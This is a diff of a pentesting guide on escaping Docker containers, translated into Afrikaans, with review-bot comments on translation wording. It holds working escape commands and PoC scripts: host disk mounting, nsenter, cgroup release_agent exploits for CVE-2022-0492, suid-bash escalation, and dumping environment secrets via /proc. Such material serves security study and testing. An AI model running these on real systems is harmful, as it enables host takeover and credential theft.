@@ -56,15 +53,14 @@ nsenter --target 1 --mount --uts --ipc --net --pid -- bash # Get full privs in container without --privileged docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash ``` - {% hint style="info" %} -In case the **docker socket is in an unexpected place** you can still communicate with it using the **`docker`** command with the parameter **`-H unix:///path/to/docker.sock`** +In die geval dat die **docker sokket op 'n onverwagte plek** is, kan jy steeds daarmee kommunikeer deur die **`docker`** bevel te gebruik met die parameter **`-H unix:///path/to/docker.sock`** {% endhint %} -Docker daemon might be also [listening in a port (by default 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) or on Systemd-based systems, communication with the Docker daemon can occur over the Systemd socket `fd://`. +Die Docker daemon kan ook [luister op 'n poort (standaard 2375, 2376)](../../../../network-services-pentesting/2375-pentesting-docker.md) of op Systemd-gebaseerde stelsels kan kommunikasie met die Docker daemon plaasvind oor die Systemd sokket `fd://`. {% hint style="info" %} -Additionally, pay attention to the runtime sockets of other high-level runtimes: +Daarbenewens, let op die uitvoeringsokkels van ander hoëvlak-uitvoeringsomgewings: * dockershim: `unix:///var/run/dockershim.sock` * containerd: `unix:///run/containerd/containerd.sock` 
@@ -74,25 +70,23 @@ Additionally, pay attention to the runtime sockets of other high-level runtimes: * ... {% endhint %} -## Capabilities Abuse Escape +## Misbruik van Bevoegdhede Ontsnapping -You should check the capabilities of the container, if it has any of the following ones, you might be able to scape from it: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`** - -You can check currently container capabilities using **previously mentioned automatic tools** or: +Jy moet die bevoegdhede van die houer nagaan, as dit een van die volgende het, kan jy daaruit ontsnap: **`CAP_SYS_ADMIN`**_,_ **`CAP_SYS_PTRACE`**, **`CAP_SYS_MODULE`**, **`DAC_READ_SEARCH`**, **`DAC_OVERRIDE, CAP_SYS_RAWIO`, `CAP_SYSLOG`, `CAP_NET_RAW`, `CAP_NET_ADMIN`** +Jy kan die huidige bevoegdhede van die houer nagaan deur die **voorheen genoemde outomatiese gereedskap** of: ```bash capsh --print ``` - -In the following page you can **learn more about linux capabilities** and how to abuse them to escape/escalate privileges: +In die volgende bladsy kan jy **meer leer oor Linux-vermoëns** en hoe om dit te misbruik om voorregte te ontsnap/verhoog: {% content-ref url="../../linux-capabilities.md" %} [linux-capabilities.md](../../linux-capabilities.md) {% endcontent-ref %} -## Escape from Privileged Containers +## Ontsnap uit Bevoorregte Houers -A privileged container can be created with the flag `--privileged` or disabling specific defenses: +'n Bevoorregte houer kan geskep word met die vlag `--privileged` of deur spesifieke verdedigings uit te skakel: * `--cap-add=ALL` * `--security-opt apparmor=unconfined` 
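Review bot: the heading `## Misbruik van Bevoegdhede Ontsnapping` is a word-for-word rendering of "Capabilities Abuse Escape" that does not parse in Afrikaans; `## Ontsnapping deur Misbruik van Bevoegdhede` keeps the meaning. The same hunk then switches terms for "capabilities", `bevoegdhede` in the heading and first paragraph but `Linux-vermoëns` in `meer leer oor Linux-vermoëns`; keep one. Note also that `om voorregte te ontsnap/verhoog` reads as "to escape privileges", whereas the source means escape (the container) or escalate privileges, e.g. `om te ontsnap of voorregte te verhoog`.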
@@ -104,51 +98,44 @@ A privileged container can be created with the flag `--privileged` or disabling * `--cgroupns=host` * `Mount /dev` -The `--privileged` flag significantly lowers container security, offering **unrestricted device access** and bypassing **several protections**. For a detailed breakdown, refer to the documentation on `--privileged`'s full impacts. +Die `--privileged` vlag verminder aansienlik die veiligheid van die houer, deur **ongeoorloofde toegang tot toestelle** te bied en **verskeie beskermings te omseil**. Vir 'n gedetailleerde uiteensetting, verwys na die dokumentasie oor die volle impakte van `--privileged`. {% content-ref url="../docker-privileged.md" %} [docker-privileged.md](../docker-privileged.md) {% endcontent-ref %} -### Privileged + hostPID +### Bevoorregte + hostPID -With these permissions you can just **move to the namespace of a process running in the host as root** like init (pid:1) just running: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash` - -Test it in a container executing: +Met hierdie toestemmings kan jy net **beweeg na die naamruimte van 'n proses wat as root in die gasheer hardloop**, soos init (pid:1), deur net die volgende uit te voer: `nsenter --target 1 --mount --uts --ipc --net --pid -- bash` +Toets dit in 'n houer deur die volgende uit te voer: ```bash docker run --rm -it --pid=host --privileged ubuntu bash ``` +### Bevoorreg -### Privileged - -Just with the privileged flag you can try to **access the host's disk** or try to **escape abusing release\_agent or other escapes**. - -Test the following bypasses in a container executing: +Net met die bevoorregte vlag kan jy probeer om **toegang tot die gasheer se skyf** te verkry of probeer om te **ontsnap deur misbruik te maak van release\_agent of ander ontsnappings**. 
+Toets die volgende omseilings in 'n houer uit te voer: ```bash docker run --rm -it --privileged ubuntu bash ``` +#### Monteer Disk - Poc1 -#### Mounting Disk - Poc1 - -Well configured docker containers won't allow command like **fdisk -l**. However on miss-configured docker command where the flag `--privileged` or `--device=/dev/sda1` with caps is specified, it is possible to get the privileges to see the host drive. +Goed geconfigureerde Docker-houders sal nie opdragte soos **fdisk -l** toelaat nie. Tog, op 'n verkeerd gekonfigureerde Docker-opdrag waar die vlag `--privileged` of `--device=/dev/sda1` met kapasiteit gespesifiseer word, is dit moontlik om die voorregte te verkry om die gasheer-aandrywing te sien. ![](https://bestestredteam.com/content/images/2019/08/image-16.png) -So to take over the host machine, it is trivial: - +Om dus die gasheer-rekenaar oor te neem, is dit eenvoudig: ```bash mkdir -p /mnt/hola mount /dev/sda1 /mnt/hola ``` +En voilà! Jy kan nou toegang verkry tot die lêersisteem van die gasheer omdat dit in die `/mnt/hola`-vouer gemoniteer is. -And voilà ! You can now access the filesystem of the host because it is mounted in the `/mnt/hola` folder. - -#### Mounting Disk - Poc2 - -Within the container, an attacker may attempt to gain further access to the underlying host OS via a writable hostPath volume created by the cluster. Below is some common things you can check within the container to see if you leverage this attacker vector: +#### Monteer Disk - Poc2 +Binne die houer kan 'n aanvaller probeer om verdere toegang tot die onderliggende gasheer-bedryfstelsel te verkry deur 'n skryfbare hostPath-volume wat deur die groep geskep is. Hieronder is 'n paar algemene dinge wat jy binne die houer kan nagaan om te sien of jy hierdie aanvallervektor kan benut: ```bash ### Check if You Can Write to a File-system echo 1 > /proc/sysrq-trigger 
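Review bot: two renderings in this hunk change the meaning of the source. `ongeoorloofde toegang tot toestelle` means unauthorized device access, while the English says "unrestricted device access"; `onbeperkte toegang tot toestelle` is the right reading. And `--device=/dev/sda1 met kapasiteit` turns "with caps" into capacity; "caps" here is short for capabilities, so `met bevoegdhede` (matching the previous section) is what is meant. Smaller points in the same hunk: `Goed geconfigureerde Docker-houders` uses a Dutch spelling and a different noun from the `houer` used everywhere else (`Goed gekonfigureerde Docker-houers`), `gasheer-aandrywing` for "host drive" would be clearer as `die gasheer se skyf`, and the headings `#### Monteer Disk - Poc1` / `Poc2` leave "Disk" untranslated.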
@@ -169,10 +156,9 @@ mount: /mnt: permission denied. ---> Failed! but if not, you may have access to ### debugfs (Interactive File System Debugger) debugfs /dev/sda1 ``` +#### Bevoorregte Ontsnapping deur gebruik te maak van bestaande release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1 -#### Privileged Escape Abusing existent release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC1 - -{% code title="Initial PoC" %} +{% code title="Aanvanklike PoC" %} ```bash # spawn a new container to exploit via: # docker run --rm -it --privileged ubuntu bash @@ -208,9 +194,9 @@ cat /o ``` {% endcode %} -#### Privileged Escape Abusing created release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2 +#### Bevoorregte Ontsnapping deur die skepping van 'n release\_agent ([cve-2022-0492](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/)) - PoC2 -{% code title="Second PoC" %} +{% code title="Tweede PoC" %} ```bash # On the host docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash @@ -246,7 +232,7 @@ chmod a+x /cmd # Executes the attack by spawning a process that immediately ends inside the "x" child cgroup # By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory -# The script on the host will execute after /bin/sh exits +# The script on the host will execute after /bin/sh exits sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" # Reads the output 
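Review bot: the `@@ -246,7 +232,7 @@` hunk touches only the comment `# The script on the host will execute after /bin/sh exits` inside the second PoC's code block, and the removed and added lines are visibly identical, so this is a trailing-whitespace change. Code blocks carry no text to translate and should not be modified in a translation commit; drop this change or put whitespace normalization in a separate commit.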
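Review bot: in the `@@ -208,9 +194,9 @@` hunk the heading `#### Bevoorregte Ontsnapping deur die skepping van 'n release\_agent` says "through the creation of a release_agent", whereas the English "Abusing created release\_agent" is deliberately parallel to PoC1's "Abusing existent release\_agent" (`bestaande release\_agent` in the previous heading). `deur misbruik van 'n geskepte release\_agent` keeps that contrast.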
@@ -254,20 +240,19 @@ cat /output ``` {% endcode %} -Find an **explanation of the technique** in: +Vind 'n **verduideliking van die tegniek** in: {% content-ref url="docker-release_agent-cgroups-escape.md" %} [docker-release\_agent-cgroups-escape.md](docker-release\_agent-cgroups-escape.md) {% endcontent-ref %} -#### Privileged Escape Abusing release\_agent without known the relative path - PoC3 +#### Bevoorregte Ontsnapping deur release\_agent te misbruik sonder om die relatiewe pad te ken - PoC3 -In the previous exploits the **absolute path of the container inside the hosts filesystem is disclosed**. However, this isn’t always the case. In cases where you **don’t know the absolute path of the container inside the host** you can use this technique: +In die vorige aanvalle word die **absoluut pad van die houer binne die gasheer se lêersisteem bekend gemaak**. Dit is egter nie altyd die geval nie. In gevalle waar jy **nie die absoluut pad van die houer binne die gasheer ken nie** kan jy hierdie tegniek gebruik: {% content-ref url="release_agent-exploit-relative-paths-to-pids.md" %} [release\_agent-exploit-relative-paths-to-pids.md](release\_agent-exploit-relative-paths-to-pids.md) {% endcontent-ref %} - ```bash #!/bin/sh 
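Review bot: `absoluut pad` (twice, in `die **absoluut pad van die houer binne die gasheer se lêersisteem**` and `nie die absoluut pad van die houer binne die gasheer ken nie`) needs the attributive form `absolute pad`. `In die vorige aanvalle` also turns "exploits" into "attacks"; `In die vorige uitbuitings` matches the `**Uitbuiting** voorbeeld` wording used later in this file. The blank line between the content-ref block and the ```bash fence has been dropped as well, which is unrelated formatting churn.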
@@ -306,20 +291,20 @@ echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release TPID=1 while [ ! -f ${OUTPUT_PATH} ] do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) +if [ $((${TPID} % 100)) -eq 0 ] +then +echo "Checking pid ${TPID}" +if [ ${TPID} -gt ${MAX_PID} ] +then +echo "Exiting at ${MAX_PID} :-(" +exit 1 +fi +fi +# Set the release_agent path to the guessed pid +echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent +# Trigger execution of the release_agent +sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" +TPID=$((${TPID} + 1)) done # Wait for and cat the output @@ -327,9 +312,7 @@ sleep 1 echo "Done! Output:" cat ${OUTPUT_PATH} ``` - -Executing the PoC within a privileged container should provide output similar to: - +Die uitvoering van die PoC binne 'n bevoorregte houer moet 'n uitset gee wat soortgelyk is aan: ```bash root@container:~$ ./release_agent_pid_brute.sh Checking pid 100 
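Review bot: the `@@ -306,20 +291,20 @@` hunk strips all indentation from the body of the `while [ ! -f ${OUTPUT_PATH} ]` loop in the release_agent PID brute-force script (the `if ... then ... fi` block, the `echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent` line and the `TPID=$((${TPID} + 1))` increment). Shell behaviour is unchanged, but the script becomes much harder to follow and none of these lines contain text to translate; restore the original indentation and keep code blocks byte-identical to the English source.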
@@ -357,37 +340,33 @@ root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] ... ``` +#### Bevoorregte Ontsnapping deur Misbruik van Sensitiewe Monteerplekke -#### Privileged Escape Abusing Sensitive Mounts +Daar is verskeie lêers wat gemonteer kan word wat **inligting oor die onderliggende gasheer gee**. Sommige van hulle kan selfs **aandui dat iets deur die gasheer uitgevoer moet word wanneer iets gebeur** (wat 'n aanvaller in staat sal stel om uit die houer te ontsnap).\ +Die misbruik van hierdie lêers kan veroorsaak dat: -There are several files that might mounted that give **information about the underlaying host**. Some of them may even indicate **something to be executed by the host when something happens** (which will allow a attacker to escape from the container).\ -The abuse of these files may allow that: - -* release\_agent (already covered before) +* release\_agent (reeds voorheen gedek) * [binfmt\_misc](sensitive-mounts.md#proc-sys-fs-binfmt\_misc) * [core\_pattern](sensitive-mounts.md#proc-sys-kernel-core\_pattern) * [uevent\_helper](sensitive-mounts.md#sys-kernel-uevent\_helper) * [modprobe](sensitive-mounts.md#proc-sys-kernel-modprobe) -However, you can find **other sensitive files** to check for in this page: +Jy kan egter **ander sensitiewe lêers** vind om na te kyk op hierdie bladsy: {% content-ref url="sensitive-mounts.md" %} [sensitive-mounts.md](sensitive-mounts.md) {% endcontent-ref %} -### Arbitrary Mounts - -In several occasions you will find that the **container has some volume mounted from the host**. If this volume wasn’t correctly configured you might be able to **access/modify sensitive data**: Read secrets, change ssh authorized\_keys… +### Willekeurige Monteerplekke +In verskeie gevalle sal jy vind dat die **houer 'n volume van die gasheer gemonteer het**. 
As hierdie volume nie korrek gekonfigureer is nie, kan jy dalk **toegang verkry tot/wysiging maak aan sensitiewe data**: Lees geheime, verander ssh authorized\_keys... ```bash docker run --rm -it -v /:/host ubuntu bash ``` +### Voorregverhoging met 2 doppe en gasheer monteer -### Privilege Escalation with 2 shells and host mount - -If you have access as **root inside a container** that has some folder from the host mounted and you have **escaped as a non privileged user to the host** and have read access over the mounted folder.\ -You can create a **bash suid file** in the **mounted folder** inside the **container** and **execute it from the host** to privesc. - +As jy toegang het as **root binne 'n houer** wat 'n paar vouers van die gasheer gemonteer het en jy het **ontsnap as 'n nie-bevoorregte gebruiker na die gasheer** en het leestoegang oor die gemonteerde vouer.\ +Jy kan 'n **bash suid-lêer** skep in die **gemonteerde vouer** binne die **houer** en dit vanaf die gasheer **uitvoer** om voorregverhoging te bewerkstellig. ```bash cp /bin/bash . #From non priv inside mounted folder # You need to copy it from the host as the bash binaries might be diferent in the host and in the container 
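Review bot: `Die misbruik van hierdie lêers kan veroorsaak dat:` opens a subordinate clause that never arrives; what follows is a bullet list of file names, so the lead-in needs to be something like `Die volgende lêers kan hiervoor misbruik word:`. The heading `### Voorregverhoging met 2 doppe en gasheer monteer` also introduces a third word for "shell" (`doppe`) next to `skel` and `skulp`/`skulpe` elsewhere in this commit; the next hunk's `### Voorregverhoging met 2 skulpe` shows the form to align on.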
@@ -395,16 +374,14 @@ chown root:root bash #From container as root inside mounted folder chmod 4777 bash #From container as root inside mounted folder bash -p #From non priv inside mounted folder ``` +### Voorregverhoging met 2 skulpe -### Privilege Escalation with 2 shells +As jy toegang het as **root binne 'n houer** en jy het **ontsnap as 'n nie-bevoorregte gebruiker na die gasheer**, kan jy beide skulpe misbruik om **voorregverhoging binne die gasheer** te bewerkstellig as jy die MKNOD-vermoë binne die houer het (dit is standaard) soos [**verduidelik in hierdie pos**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/).\ +Met so 'n vermoë word die root-gebruiker binne die houer toegelaat om **bloktoestel-lêers te skep**. Toestel-lêers is spesiale lêers wat gebruik word om **onderliggende hardeware- en kernmodules te benader**. Byvoorbeeld, die /dev/sda bloktoestel-lêer gee toegang om **die rou data op die stelsel se skyf te lees**. -If you have access as **root inside a container** and you have **escaped as a non privileged user to the host**, you can abuse both shells to **privesc inside the host** if you have the capability MKNOD inside the container (it's by default) as [**explained in this post**](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/).\ -With such capability the root user within the container is allowed to **create block device files**. Device files are special files that are used to **access underlying hardware & kernel modules**. For example, the /dev/sda block device file gives access to **read the raw data on the systems disk**. - -Docker safeguards against block device misuse within containers by enforcing a cgroup policy that **blocks block device read/write operations**. Nevertheless, if a block device is **created inside the container**, it becomes accessible from outside the container via the **/proc/PID/root/** directory. 
This access requires the **process owner to be the same** both inside and outside the container. - -**Exploitation** example from this [**writeup**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/): +Docker beskerm teen misbruik van bloktoestelle binne houers deur 'n cgroup-beleid af te dwing wat **bloktoestel lees-/skryfhandelinge blokkeer**. Nietemin, as 'n bloktoestel **binne die houer geskep word**, word dit toeganklik van buite die houer via die **/proc/PID/root/** gids. Hierdie toegang vereis dat die **proses-eienaar dieselfde is** binne en buite die houer. +**Uitbuiting** voorbeeld van hierdie [**verslag**](https://radboudinstituteof.pwning.nl/posts/htbunictfquals2021/goodgames/): ```bash # On the container as root cd / @@ -422,7 +399,7 @@ su: Authentication failure (Ignored) augustus@3a453ab39d3d:/backend$ /bin/sh /bin/sh -$ +$ ``` ```bash 
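Review bot: The only change in the `@@ -422,7 +399,7 @@` hunk is trailing whitespace on a captured prompt line (`-$ ` to `+$`), an edit inside quoted terminal output rather than a translation; the same whitespace-only edit appears on the `grep -a 'HTB{' /proc/1659/root/sda` line in the following hunk. Leave captured output blocks byte-for-byte as they were so the diff shows translated prose only.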
@@ -437,22 +414,18 @@ augustus 1661 0.0 0.0 6116 648 pts/0 S+ 09:48 0:00 \_ # The process ID is 1659 in this case # Grep for the sda for HTB{ through the process: -augustus@GoodGames:~$ grep -a 'HTB{' /proc/1659/root/sda +augustus@GoodGames:~$ grep -a 'HTB{' /proc/1659/root/sda HTB{7h4T_w45_Tr1cKy_1_D4r3_54y} ``` - ### hostPID -If you can access the processes of the host you are going to be able to access a lot of sensitive information stored in those processes. Run test lab: - +As jy toegang het tot die prosesse van die gasheer, sal jy toegang hê tot baie sensitiewe inligting wat in daardie prosesse gestoor word. Voer toetslaboratorium uit: ``` docker run --rm -it --pid=host ubuntu bash ``` +Byvoorbeeld, sal jy in staat wees om die prosesse te lys deur iets soos `ps auxn` te gebruik en te soek na sensitiewe besonderhede in die opdragte. -For example, you will be able to list the processes using something like `ps auxn` and search for sensitive details in the commands. - -Then, as you can **access each process of the host in /proc/ you can just steal their env secrets** running: - +Dan, aangesien jy **toegang het tot elke proses van die gasheer in /proc/, kan jy net hul omgewingsgeheime steel** deur die volgende uit te voer: ```bash for e in `ls /proc/*/environ`; do echo; echo $e; xargs -0 -L1 -a $e; done /proc/988058/environ @@ -461,9 +434,7 @@ HOSTNAME=argocd-server-69678b4f65-6mmql USER=abrgocd ... ``` - -You can also **access other processes file descriptors and read their open files**: - +Jy kan ook **toegang verkry tot ander prosesse se lêerbeskrywers en hul oop lêers lees**: ```bash for fd in `find /proc/*/fd`; do ls -al $fd/* 2>/dev/null | grep \>; done > fds.txt less fds.txt 
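Review bot: In the `@@ -437,22 +414,18 @@` hunk "Run test lab:" is rendered word for word as `+... Voer toetslaboratorium uit:`, which reads as "execute a test laboratory"; the English means "start the test lab (with the following command)", so something like "Begin die toetsomgewing:" fits better. The hunk also drops every blank line between prose and the fenced blocks (`-` blank lines before and after each ```` ``` ````); these carry no translation and should stay so the Afrikaans file keeps the same layout as the English source.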
@@ -473,89 +444,82 @@ lrwx------ 1 root root 64 Jun 15 02:25 /proc/635813/fd/4 -> /.secret.txt.swp # You can open the secret filw with: cat /proc/635813/fd/4 ``` - -You can also **kill processes and cause a DoS**. +Jy kan ook **prosesse doodmaak en 'n DoS veroorsaak**. {% hint style="warning" %} -If you somehow have privileged **access over a process outside of the container**, you could run something like `nsenter --target --all` or `nsenter --target --mount --net --pid --cgroup` to **run a shell with the same ns restrictions** (hopefully none) **as that process.** +As jy op een of ander manier bevoorregte **toegang het tot 'n proses buite die houer**, kan jy iets soos `nsenter --target --all` of `nsenter --target --mount --net --pid --cgroup` hardloop om **'n skul met dieselfde ns-beperkings** (hopelik geen) **as daardie proses** uit te voer. {% endhint %} ### hostNetwork - ``` docker run --rm -it --network=host ubuntu bash ``` +As 'n houer gekonfigureer is met die Docker [host-netwerkbestuurder (`--network=host`)](https://docs.docker.com/network/host/), is daardie houer se netwerkstapel nie geïsoleer van die Docker-gashouer nie (die houer deel die gashouer se netwerk-namespace) en die houer kry nie sy eie IP-adres toegewys nie. Met ander woorde, die **houer bind alle dienste direk aan die gashouer se IP**. Verder kan die houer **ALLE netwerkverkeer onderskep wat die gashouer** stuur en ontvang op die gedeelde koppelvlak `tcpdump -i eth0`. -If a container was configured with the Docker [host networking driver (`--network=host`)](https://docs.docker.com/network/host/), that container's network stack is not isolated from the Docker host (the container shares the host's networking namespace), and the container does not get its own IP-address allocated. In other words, the **container binds all services directly to the host's IP**. 
Furthermore the container can **intercept ALL network traffic that the host** is sending and receiving on shared interface `tcpdump -i eth0`. +Byvoorbeeld, jy kan dit gebruik om verkeer tussen die gashouer en metadata-instansie **af te luister en selfs te vervals**. -For instance, you can use this to **sniff and even spoof traffic** between host and metadata instance. +Soos in die volgende voorbeelde: -Like in the following examples: +* [Writeup: Hoe om Google SRE te kontak: 'n Skulp in die wolk SQL laat val](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) +* [Metadata-diens MITM maak wortelvoorregverhoging moontlik (EKS / GKE)](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/) -* [Writeup: How to contact Google SRE: Dropping a shell in cloud SQL](https://offensi.com/2020/08/18/how-to-contact-google-sre-dropping-a-shell-in-cloud-sql/) -* [Metadata service MITM allows root privilege escalation (EKS / GKE)](https://blog.champtar.fr/Metadata\_MITM\_root\_EKS\_GKE/) - -You will be able also to access **network services binded to localhost** inside the host or even access the **metadata permissions of the node** (which might be different those a container can access). +Jy sal ook in staat wees om toegang te verkry tot **netwerkdienste wat aan die localhost gebind is** binne die gashouer of selfs toegang te verkry tot die **metadata-permissies van die node** (wat verskillend kan wees as dié wat 'n houer kan verkry). ### hostIPC - ```bash docker run --rm -it --ipc=host ubuntu bash ``` +Met `hostIPC=true` kry jy toegang tot die gasheer se interproseskommunikasie (IPC) hulpbronne, soos **gedeelde geheue** in `/dev/shm`. Dit maak dit moontlik om te lees/skryf waar dieselfde IPC-hulpbronne deur ander gasheer- of houerprosesse gebruik word. Gebruik `ipcs` om hierdie IPC-meganismes verder te ondersoek. 
-With `hostIPC=true`, you gain access to the host's inter-process communication (IPC) resources, such as **shared memory** in `/dev/shm`. This allows reading/writing where the same IPC resources are used by other host or pod processes. Use `ipcs` to inspect these IPC mechanisms further. +* **Ondersoek /dev/shm** - Kyk vir enige lêers in hierdie gedeelde geheue-plek: `ls -la /dev/shm` +* **Ondersoek bestaande IPC-fasiliteite** - Jy kan nagaan of enige IPC-fasiliteite gebruik word met `/usr/bin/ipcs`. Kontroleer dit met: `ipcs -a` -* **Inspect /dev/shm** - Look for any files in this shared memory location: `ls -la /dev/shm` -* **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs`. Check it with: `ipcs -a` - -### Recover capabilities - -If the syscall **`unshare`** is not forbidden you can recover all the capabilities running: +### Herstel bevoegdhede +As die systoeproep **`unshare`** nie verbied is nie, kan jy al die bevoegdhede herstel deur die volgende uit te voer: ```bash unshare -UrmCpf bash # Check them with cat /proc/self/status | grep CapEff ``` +### Gebruikersnaamruimte-misbruik via symboliese koppeling -### User namespace abuse via symlink - -The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files). +Die tweede tegniek wat in die berig [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) verduidelik word, dui aan hoe jy bindkoppeling met gebruikersnaamruimtes kan misbruik om lêers binne die gasheer te beïnvloed (in daardie spesifieke geval, lêers uitvee).
-Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik werkstrome te bou en outomatiseer met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## CVEs +## CVE's -### Runc exploit (CVE-2019-5736) +### Runc-uitbuiting (CVE-2019-5736) -In case you can execute `docker exec` as root (probably with sudo), you try to escalate privileges escaping from a container abusing CVE-2019-5736 (exploit [here](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). This technique will basically **overwrite** the _**/bin/sh**_ binary of the **host** **from a container**, so anyone executing docker exec may trigger the payload. +In die geval dat jy `docker exec` as root kan uitvoer (waarskynlik met sudo), kan jy probeer om voorregte te verhoog deur te ontsnap uit 'n houer wat misbruik maak van CVE-2019-5736 (uitbuiting [hier](https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go)). Hierdie tegniek sal basies die _**/bin/sh**_ binêre lêer van die **gasheer** **oorvleuel** vanuit 'n houer, sodat enigeen wat docker exec uitvoer die nut kan aktiveer. -Change the payload accordingly and build the main.go with `go build main.go`. The resulting binary should be placed in the docker container for execution.\ -Upon execution, as soon as it displays `[+] Overwritten /bin/sh successfully` you need to execute the following from the host machine: +Verander die nut volgens jou behoeftes en bou die main.go met `go build main.go`. 
Die resulterende binêre lêer moet in die docker-houer geplaas word vir uitvoering.\ +By uitvoering, sodra dit `[+] Overwritten /bin/sh successfully` vertoon, moet jy die volgende vanaf die gasheermasjien uitvoer: -`docker exec -it /bin/sh` +`docker exec -it /bin/sh` -This will trigger the payload which is present in the main.go file. +Dit sal die nut aktiveer wat in die main.go-lêer aanwesig is. -For more information: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) +Vir meer inligting: [https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) {% hint style="info" %} -There are other CVEs the container can be vulnerable too, you can find a list in [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) +Daar is ander CVE's waarop die houer kwesbaar kan wees, jy kan 'n lys vind by [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/cve-list) {% endhint %} -## Docker Custom Escape +## Aangepaste Docker-ontsnapping -### Docker Escape Surface +### Docker-ontsnappingsoppervlak -* **Namespaces:** The process should be **completely separated from other processes** via namespaces, so we cannot escape interacting with other procs due to namespaces (by default cannot communicate via IPCs, unix sockets, network svcs, D-Bus, `/proc` of other procs). -* **Root user**: By default the user running the process is the root user (however its privileges are limited). 
-* **Capabilities**: Docker leaves the following capabilities: `cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` -* **Syscalls**: These are the syscalls that the **root user won't be able to call** (because of lacking capabilities + Seccomp). The other syscalls could be used to try to escape. +* **Naamruimtes:** Die proses moet **volledig geskei wees van ander prosesse** via naamruimtes, sodat ons nie kan ontsnap deur met ander prosesse te kommunikeer nie (kan nie standaard kommunikeer via IPC's, Unix-aansluitings, netwerkdienste, D-Bus, `/proc` van ander prosesse nie). +* **Root-gebruiker**: Standaard is die gebruiker wat die proses uitvoer die root-gebruiker (tans beperkte voorregte). +* **Vermoëns**: Docker laat die volgende vermoëns agter: `cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap=ep` +* **Syscalls**: Dit is die syscalls wat die **root-gebruiker nie sal kan aanroep nie** (as gevolg van ontbrekende vermoëns + Seccomp). Die ander syscalls kan gebruik word om te probeer ontsnap. {% tabs %} {% tab title="x64 syscalls" %} 
